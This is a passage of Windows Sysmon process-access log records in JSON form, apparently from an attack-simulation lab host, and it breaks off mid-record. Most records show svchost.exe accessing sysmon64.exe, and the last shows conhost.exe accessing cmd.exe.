C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 